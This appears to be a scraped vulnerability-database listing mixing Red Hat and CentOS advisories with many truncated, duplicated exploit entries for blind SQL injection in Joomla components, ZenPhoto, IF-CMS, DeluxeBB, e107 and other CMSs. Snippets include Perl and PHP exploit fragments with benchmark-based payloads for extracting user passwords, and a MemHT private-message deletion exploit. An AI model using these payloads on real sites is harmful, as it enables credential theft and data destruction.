Important: Red Hat Security Advisory: kvm security and bug fix update

Updated kvm packages that fix multiple security issues and several bugs are now available for Red Hat Enterprise Linux 5. This update has been rated as having important security impact by the Red Hat Security Response Team. KVM Kernel-based Virtual Machine is a full virtualization solution for...

CentOS 5 : nfs-utils (CESA-2009:1321)

An updated nfs-utils package that fixes a security issue and several bugs is now available. This update has been rated as having low security impact by the Red Hat Security Response Team. The nfs-utils package provides a daemon for the kernel NFS server and related tools. It was discovered that...

Joomla! Component com_jlord_rss - id Blind SQL Injection

Joomla! Component comjlordrss - id Blind SQL Injection !/usr/bin/perl -w use LWP::UserAgent; use Benchmark; my $t1 = new Benchmark; print "\t\t------------------------------------------------------------\n\n"; print "\t\t | Chip d3 Bi0s | \n\n"; print "\t\t RSS Feed Creator by foobla \n\n"; print...

Joomla! Component com_jlord_rss - 'id' Blind SQL Injection

!/usr/bin/perl -w use LWP::UserAgent; use Benchmark; my $t1 = new Benchmark; print "\t\t------------------------------------------------------------\n\n"; print "\t\t | Chip d3 Bi0s | \n\n"; print "\t\t RSS Feed Creator by foobla \n\n"; print "\t\t Joomla Component comjlordrs id BSQL \n\n"; print...

RHEL 5 : nfs-utils (RHSA-2009:1321)

The remote Redhat Enterprise Linux 5 host has a package installed that is affected by a vulnerability as referenced in the RHSA-2009:1321 advisory. The nfs-utils package provides a daemon for the kernel NFS server and related tools. It was discovered that nfs-utils did not use tcpwrappers...

ZenPhoto 1.2.5 Blind SQL Injection

/ ZenPhoto 1.2.5 Completly Blind SQL Injection Exploit Requirements: magicquotes = ANY zenpage disables it anyway, ZenPage needs to be activated and have at least one news category What does this exploit let you do: The precoded functions I provided will allow you to extract the username and...

MemHT Portal 4.0.1 - Delete All Private Messages

MemHT Portal 4.0.1 - Delete All Private Messages !/usr/bin/perl MemHT Portal query"DELETE FROM memhtpvtmsg WHERE id=$value"; if isset$POST'deletepm' foreach $POST'deletepm' as $value $dblink-query"DELETE FROM memhtpvtmsg WHERE id=$value"; ? ok then foreach $POST'deletenewpm' as $value deletenewpm...

MemHT Portal <= 4.0.1 (pvtmsg) Delete All Private Messages Exploit

Exploit for unknown platform in category web applications ================================================================== MemHT Portal query"DELETE FROM memhtpvtmsg WHERE id=$value"; if isset$POST'deletepm' foreach $POST'deletepm' as $value $dblink-query"DELETE FROM memhtpvtmsg WHERE id=$value...

IF-CMS &lt;= 2.0 (frame.php id) Blind SQL Injection Exploit

No description provided by source. --+++=======================================================+++-- --+++====== IF-CMS = 2.0 Blind SQL Injection Exploit ======+++-- --+++=======================================================+++-- ?php function query $username, $char, $pos //Increase benchmark...

IF-CMS 2.0 - id Blind SQL Injection

IF-CMS 2.0 - id Blind SQL Injection --+++=======================================================+++-- --+++====== IF-CMS 4 return true; else return false; function usage echo "\nIF-CMS ". "\n+ Ex. : php xpl.php localhost /IF-CMS root". "\n\n"; exit ; if $argc != 4 us...

PHP-CMS 1 - &#039;Username&#039; Blind SQL Injection

--+++===================================================+++-- --+++====== PHP-CMS 1 Blind SQL Injection Exploit ======+++-- --+++===================================================+++-- 4 return true; else return false; function usage echo "\nPHP-CMS 1 Blind SQL Injection Exploit". "\n+ Author :...

DeluxeBB 1.2 - Blind SQL Injection

!/usr/bin/perl -------------------------------------------------- DeluxeBB 5; if @ARGV != 5 print "\n+----------------------------------------------------+\r", "\n| DeluxeBB = 1.2 Remote Blind SQL Injection Exploit |\r", "\n+----------------------------------------------------+\r", "\nby athos -...

CVE-2008-5713

The qdiscrun function in net/sched/schgeneric.c in the Linux kernel before 2.6.25 on SMP machines allows local users to cause a denial of service soft lockup by sending a large amount of network traffic, as demonstrated by multiple simultaneous invocations of the Netperf benchmark application in...

Lizardware CMS 0.6.0 Blind SQL Injection

!/usr/bin/perl -w Lizardware CMS post$host, user = $param, pass = 'anything' ; sub givechar my $send = undef; my $charz,$uidz = @; $send = "' or select ifasciisubstring". "userpassword,$uidz,1=$charz,". "benchmark230000000,char0,". "0 from $ptableusers where userid=$userid"; return $send; for1..3...

Lizardware CMS <= 0.6.0 Blind SQL Injection Exploit

Exploit for unknown platform in category web applications =================================================== Lizardware CMS post$host, user = $param, pass = 'anything' ; sub givechar my $send = undef; my $charz,$uidz = @; $send = "' or select ifasciisubstring". "userpassword,$uidz,1=$charz,"...

Mediatheka 4.2 - Blind SQL Injection

Mediatheka 4.2 - Blind SQL Injection !/usr/bin/perl -w Mediatheka post$host, user = $param, password = 'anything' ; sub givechar my $send = undef; my $charz,$uidz = @; $send = "' or select ifasciisubstring". "password,$uidz,1=$charz,". "benchmark200000000,char0,". "0 from users where id=$userid";...

Mediatheka 4.2 - Blind SQL Injection

!/usr/bin/perl -w Mediatheka post$host, user = $param, password = 'anything' ; sub givechar my $send = undef; my $charz,$uidz = @; $send = "' or select ifasciisubstring". "password,$uidz,1=$charz,". "benchmark200000000,char0,". "0 from users where id=$userid"; return $send; for1..32 foreach my...

phpBB 3 (Mod Tag Board <= 4) Remote Blind SQL Injection Exploit

Exploit for unknown platform in category web applications =============================================================== phpBB 3 Mod Tag Board = 4 Remote Blind SQL Injection Exploit =============================================================== !/usr/bin/perl...

e107 &lt;= 0.7.13 (usersettings.php) Blind SQL Injection Exploit

No description provided by source. Author: GiReX Homepage: http://girex.altervista.org Date: 19/10/2008 CMS: e107 URL: http://e107.org/ Note: Works regardless of php.ini settings magicquotes, registerglobals.. Attenction: This exploit was written for educational purpose. Use it at your own risk...

e107 <= 0.7.13 (usersettings.php) Blind SQL Injection Exploit

Exploit for unknown platform in category web applications ============================================================= e107 $val $err = $ue-userextendedvalidateentry$val,$extList$key; if!$err $val = $tp-toDB$val; == Cleans values $uefields .= $key."='".$val."'"; == Here our $POST'ue' keys and...